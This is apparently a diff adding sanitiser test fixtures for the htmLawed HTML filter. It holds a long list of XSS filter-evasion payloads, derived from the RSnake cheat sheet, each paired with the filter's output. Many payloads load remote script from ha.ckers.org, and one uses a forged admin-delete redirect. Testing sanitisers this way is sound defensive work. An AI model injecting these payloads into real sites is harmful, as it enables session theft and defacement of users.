<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
|
||||||
|
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
|
||||||
|
<div style="background-image: url('denied:js:xss')"></div><br />
|
||||||
|
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
|
||||||
|
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
|
||||||
|
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
|
||||||
|
|
||||||
|
<h6>Other</h6>
|
||||||
|
|
||||||
|
3 < 4 <br />
|
||||||
|
3 > 4 <br />
|
||||||
|
> 3 <br />
|
||||||
|
<._.> hi! <br />
|
||||||
|
<<< ALERT >>> <br />
|
||||||
|
<![if !vml]> some stuff <![endif]> <br />
|
||||||
|
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> <br />
|
||||||
|
<uml:ns ns = "urn:www"> <br />
|
||||||
|
<uml:ns ns = 'urn:www'> <br />
|
||||||
|
if(13<age AND 21>age){say 'teen'} <br />
|
||||||
|
age >51 and a smoking history of >51 pack-years <b>was</b> <br />
|
||||||
|
age > 51 and a smoking history of >51 pack-years <b>was</b> <br />
|
||||||
|
age <51 and a smoking history of <51 pack-years <b>was</b> <br />
|
||||||
|
age < 51 and a smoking history of < 51 pack-years <b>was</b> <br />
|
||||||
|
<b>age >51 and a smoking history of >51 pack-years</b> <br />
|
||||||
|
<b>age > 51 and a smoking history of >51 pack-years</b> <br />
|
||||||
|
<b>age <51 and a smoking history of <51 pack-years</b> <br />
|
||||||
|
<b>age < 51 and a smoking history of < 51 pack-years</b> <br />
|
||||||
|
</b></span>
|
|
@ -0,0 +1,642 @@
|
||||||
|
1. XSS Locator
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
2. XSS Quick Test
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
|
||||||
|
3. SCRIPT w/Alert()
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>alert('XSS')</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>alert('XSS')</SCRIPT>
|
||||||
|
|
||||||
|
4. SCRIPT w/Source File
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
|
||||||
|
5. SCRIPT w/Char Code
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
6. DIV background-image 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
|
||||||
|
|
||||||
|
7. DIV background-image 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
|
||||||
|
|
||||||
|
8. DIV expression
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="width: (alert('XSS'));"></div>
|
||||||
|
|
||||||
|
9. IFRAME
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
|
||||||
|
10. INPUT Image
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<input type="image" src="denied:javascript:alert('XSS');" />
|
||||||
|
|
||||||
|
11. IMG w/JavaScript Directive
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
12. IMG No Quotes/Semicolon
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert(" alt="image" />
|
||||||
|
|
||||||
|
13. IMG Dynsrc
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG DYNSRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" />
|
||||||
|
|
||||||
|
14. IMG Lowsrc
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG LOWSRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" />
|
||||||
|
|
||||||
|
15. IMG Embedded commands 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
|
||||||
|
|
||||||
|
16. IMG Embedded commands 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||||
|
|
||||||
|
17. IMG STYLE w/expression
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
|
||||||
|
18. IMG w/VBscript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:vbscript:msgbox("XSS")" alt="image" />
|
||||||
|
|
||||||
|
19. LAYER
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
|
||||||
|
20. Livescript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="livescript:[code]">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:livescript:[code]" alt="image" />
|
||||||
|
|
||||||
|
21. US-ASCII encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||||
|
|
||||||
|
22. Mocha
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="mocha:[code]">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:mocha:[code]" alt="image" />
|
||||||
|
|
||||||
|
23. OBJECT
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
|
||||||
|
24. OBJECT w/Embedded XSS
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
|
||||||
|
|
||||||
|
25. Embed Flash
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
|
||||||
|
26. OBJECT w/Flash 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
|
||||||
|
27. STYLE
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
|
||||||
|
28. STYLE w/Comment
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
|
||||||
|
|
||||||
|
29. STYLE w/Anonymous HTML
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
|
||||||
|
30. TABLE
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<table></table>
|
||||||
|
|
||||||
|
31. TD
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<table><td></td></table>
|
||||||
|
|
||||||
|
32. XML namespace
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
|
||||||
|
33. XML data island w/CDATA
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><span></span>
|
||||||
|
|
||||||
|
34. XML data island w/comment
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
||||||
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>
|
||||||
|
<span></span>
|
||||||
|
|
||||||
|
35. XML (locally hosted)
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||||
|
<span></span>
|
||||||
|
|
||||||
|
36. XML HTML+TIME
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
||||||
|
|
||||||
|
37. Commented-out Block
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
|
||||||
|
38. Rename .js to .jpg
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
|
||||||
|
39. SSI
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
|
||||||
|
40. PHP
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
|
||||||
|
41. JavaScript Includes
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<BR SIZE="&{alert('XSS')}">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<br />
|
||||||
|
|
||||||
|
42. Case Insensitive
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:JaVaScRiPt:alert(" alt="image" />
|
||||||
|
|
||||||
|
43. HTML Entities
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert("XSS")>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert("XSS")" alt="image" />
|
||||||
|
|
||||||
|
44. Grave Accents
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:`javascript:alert(" alt="image" />
|
||||||
|
|
||||||
|
45. Image w/CharCode
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
|
||||||
|
|
||||||
|
46. UTF-8 Unicode Encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert('XSS')" alt="image" />
|
||||||
|
|
||||||
|
47. Long UTF-8 Unicode w/out Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />
|
||||||
|
|
||||||
|
48. DIV w/Unicode
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
|
||||||
|
|
||||||
|
49. Hex Encoding w/out Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />
|
||||||
|
|
||||||
|
50. Embedded Tab
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
51. Embedded Encoded Tab
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav	ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
52. Embedded Newline
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
53. Embedded Carriage Return
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
54. Multiline w/Carriage Returns
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG
|
||||||
|
SRC
|
||||||
|
=
|
||||||
|
"
|
||||||
|
j
|
||||||
|
a
|
||||||
|
v
|
||||||
|
a
|
||||||
|
s
|
||||||
|
c
|
||||||
|
r
|
||||||
|
i
|
||||||
|
p
|
||||||
|
t
|
||||||
|
:
|
||||||
|
a
|
||||||
|
l
|
||||||
|
e
|
||||||
|
r
|
||||||
|
t
|
||||||
|
(
|
||||||
|
'
|
||||||
|
X
|
||||||
|
S
|
||||||
|
S
|
||||||
|
'
|
||||||
|
)
|
||||||
|
"
|
||||||
|
>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
|
||||||
|
|
||||||
|
55. Spaces/Meta Chars
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
56. Non-Alpha/Non-Digit
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
57. Non-Alpha/Non-Digit Part 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
|
||||||
|
58. No Closing Script Tag
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||||
|
|
||||||
|
59. Protocol resolution in script tags
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
|
||||||
|
60. Half-Open HTML/JavaScript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
|
||||||
|
61. Double open angle brackets
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||||
|
|
||||||
|
62. Extraneous Open Brackets
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
|
||||||
|
63. Malformed IMG Tags
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
|
||||||
|
64. No Quotes/Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
|
||||||
|
65. Evade Regex Filter 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
66. Evade Regex Filter 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
67. Evade Regex Filter 3
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
68. Evade Regex Filter 4
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
69. Evade Regex Filter 5
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
70. Filter Evasion 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
71. Filter Evasion 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
72. Mixed Encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<A HREF="h
|
||||||
|
tt p://6	6.000146.0x7.147/">XSS</A>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
|
||||||
|
|
||||||
|
73. JavaScript Link Location
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>
@ -2,4 +2,4 @@
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
